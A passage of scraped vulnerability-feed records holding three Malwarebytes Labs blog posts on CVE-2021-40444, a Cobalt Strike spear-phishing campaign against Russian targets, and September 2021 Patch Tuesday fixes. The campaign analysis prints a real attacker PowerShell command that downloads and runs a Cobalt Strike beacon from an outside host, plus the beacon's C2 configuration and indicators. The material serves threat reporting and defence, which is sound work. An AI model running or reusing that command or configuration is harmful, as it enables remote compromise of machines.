Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select "Export". Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. 
Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You'll be prompted about adding the information to the registry; agree, and then reboot your machine.\n\n## Update September 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This blocks the exploit only until a user clicks the 'Enable Editing' button. Sadly, experience has taught us that it is not a good idea to trust that they won't do that. Another problem with this flag is that it doesn't survive when the file is handled by other applications, for example when it is unzipped. Another problem is that certain file types use the same MSHTML to view web content, but are not protected by Office's Protected View security feature. 
Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attack using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer was supposed to effectively block the current attacks. But security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft's current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the 'Enable Editing' button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html_ file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to "edit" the Word doc the researchers analyzed_\n\n## Update September 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>), threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddie and wannabe 
hacker can follow step-by-step instructions to build their own attacks. The method we mentioned that uses an RTF file even works in Windows Explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT\\.docx\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT\\.doc\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT\\.docm\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT\\.rtf\\ShellEx\\{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. 
Click **OK**.\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe, everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we've witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. 
We've also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Besides those known groups, we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that, instead of targeting Ukraine, is focusing on Russian citizens and government entities. Based on the email content, it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails warn people who use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the "Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation" and "Federal Service for Supervision of Communications, Information Technology and Mass Communications" of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also, the actor leveraged a new variant of this exploit called CABLESS in this attack. 
[Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! 
Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! 
Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat 
actor are in Russian and pretend to be from Russia's "Ministry of Information Technologies and Communications of the Russian Federation" and "MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS". One of them is a letter about limiting access to the Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contain an embedded URL that downloads an HTML file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe HTML file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, the WSF data contains JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded HTML exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim's machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . 
$env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. 
This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses "_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_" (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell-based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 URL, intervals, debug mode and a parameter named group that is initialized with "Madagascar", which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the "Initialize-Engine" function. This function collects the victim's info including OS info, Username, Hostname, Bios info and also a host-domain value that shows whether the machine is a domain member or not. 
It then appends all the collected info into a string, separated by the "|" character, and at the end it adds the group name and API config value. The created string is sent to the server using the _Send-WebInit_ function. This function adds the "INIT%%%" string to the created string, Base64-encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the "Invoke-Engine" function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends "GETTASK%%" in Base64 format to its server to show it is ready to get tasks and execute them. The "IC" command is used to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be sent to the server using the "PUTTASK%%" command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor, highlighting that the different lures are all connected. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. 
We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain:** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc:** \nc7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0 \n**PowerShell Rat C2:** \nswordoke[.]com \n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T16:35:06", "description": "The September 2021 Patch Tuesday could be remembered as the _final_ patching attempt in the PrintNightmare\u2026 nightmare. The ease with which the vulnerabilities [shrugged off the August patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) doesn\u2019t look to get a rerun. So far we haven\u2019t seen any indications that this patch is so easy to circumvent.\n\nThe total count of fixes for this Patch Tuesday tallies up to 86, including 26 for Microsoft Edge alone. Only a few of these vulnerabilities are listed as zero-days and two of them are "old friends". There is a third, less-likely-to-be-exploited one, and then we get to introduce a whole new set of vulnerabilities nicknamed OMIGOD, for reasons that will become obvious.\n\nAzure was the subject of five CVE\u2019s, one of them listed as critical. 
The four that affect the Open Management Infrastructure (OMI) were found by researchers, grouped together and received the nickname OMIGOD.\n\n### PrintNightmare\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a malicious printer driver to a vulnerable machine, and could use their new-found superpowers to install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe problem was made worse by significant [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) about whether PrintNightmare was a known, patched problem or an entirely new problem, and by repeated, at best partially-successful, attempts to patch it.\n\nThis month, Microsoft patched the remaining Print Spooler vulnerabilities under [CVE-2021-36958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36958>). Fingers crossed.\n\n### MSHTML\n\nThis zero-day vulnerability that felt like a ghost from the past (it involved ActiveX, remember that?) was only [found last week](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>), but has attracted significant attention. It was listed as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), a Remote Code Execution (RCE) vulnerability in Microsoft MSHTML. \n\nThreat actors were sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker was able to follow step-by-step instructions in order to launch their own attacks. 
Microsoft published mitigation instructions that disabled the installation of new ActiveX controls, but this turned out to be easy to work around for attackers.\n\nGiven the short window of opportunity, there was some doubt about whether a fix would be included in this Patch Tuesday, but it looks like Microsoft managed to pull it off.\n\n### DNS elevation of privilege vulnerability\n\nThis vulnerability was listed as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>) and affects systems running Windows Server 2008 R2 SP1, SP2 and Windows 7 SP1. It exists due to an application that does not properly impose security restrictions in Windows DNS. The vulnerability is listed as a zero-day because it has been publicly disclosed, not because it is actively being exploited.\n\nMicrosoft says that exploitation is \u201cless likely\u201d, perhaps because it requires initial authentication and can only be exploited locally. If these conditions are met this bug can be used to accomplish elevation of privilege (EoP). \n\n### OMIGOD\n\nOMIGOD is the name for a set of four vulnerabilities in the Open Management Infrastructure (OMI) that you will find embedded in many popular Azure services. 
The CVEs are:\n\n * [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>) OMI RCE Vulnerability with a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n * [CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) Open Management Infrastructure Elevation of Privilege Vulnerability\n\nThe [researchers](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) that discovered the vulnerabilities consider OMIGOD to be a result of the supply-chain risks that come with using open-source code:\n\n> Wiz\u2019s research team recently discovered a series of alarming vulnerabilities that highlight the supply chain risk of open source code, particularly for customers of cloud computing services.\n\nOMI runs as root (the highest privilege level) and is activated within Azure when users enable certain services, like distributed logging, or other management tools and services. It's likely that many users aren't even aware they have it running.\n\nThe RCE vulnerability (CVE-2021-38647) can be exploited in situations where the OMI ports are accessible to the Internet to allow for remote management. In this configuration, any user can communicate with it using a UNIX socket or via an HTTP API, and any user can abuse it to remotely execute code or escalate privileges.\n\nA coding mistake means that any incoming request to the service _without_ an authorization header has its privileges default to uid=0, gid=0, which is root. 
\n \nOMIGOD, right?\n\nThe researchers report that the flaw can only be used to remotely take over a target when OMI exposes the HTTPS management port externally. This is the default configuration when installed standalone and in Azure Configuration Management or System Center Operations Manager (SCOM). Other Azure services (such as Log Analytics) do not expose this port, so in those cases the scope is limited to local privilege escalation.\n\nThey advise all Azure customers to connect to their Azure VMs and run the commands below in their terminal to ensure OMI is updated to the latest version:\n\n * For Debian systems (e.g., Ubuntu): `dpkg -l omi`\n * For Red Hat-based systems (e.g., Fedora, CentOS, RHEL): `rpm -qa omi`\n\nIf OMI isn\u2019t installed, the commands won't return any results, and your machine isn\u2019t vulnerable. Version 1.6.8.1 is the patched version. All earlier versions need to be patched.\n\n## Update September 17, 2021\n\nAfter a proof-of-concept exploit was published on code hosting website GitHub, attackers were noticed to be looking for Linux servers running on Microsoft\u2019s Azure cloud infrastructure. These systems are vulnerable to the security flaw called OMIGOD.\n\nAccording to reports from security researchers, the attackers use the OMIGOD exploit to deploy malware that ensnares the hacked server into cryptomining or DDoS botnets.\n\nThe post [[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-15T13:19:48", "type": "malwarebytes", "title": "[updated] Patch now! 
